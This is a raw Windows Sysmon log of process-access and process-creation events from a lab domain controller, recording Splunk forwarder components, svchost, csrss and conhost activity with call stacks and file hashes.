13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9019-6005-0A01-00000000A301}2128C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9019-6005-0A01-00000000A301}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-9019-6005-0A01-00000000A301}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.505{59A5CD1D-9019-6005-0901-00000000A301}28162760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9019-6005-0901-00000000A301}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9019-6005-0901-00000000A301}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9019-6005-0901-00000000A301}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.365{59A5CD1D-9019-6005-0901-00000000A301}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.348{59A5CD1D-901B-6005-0B01-00000000A301}15122956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-901B-6005-0B01-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 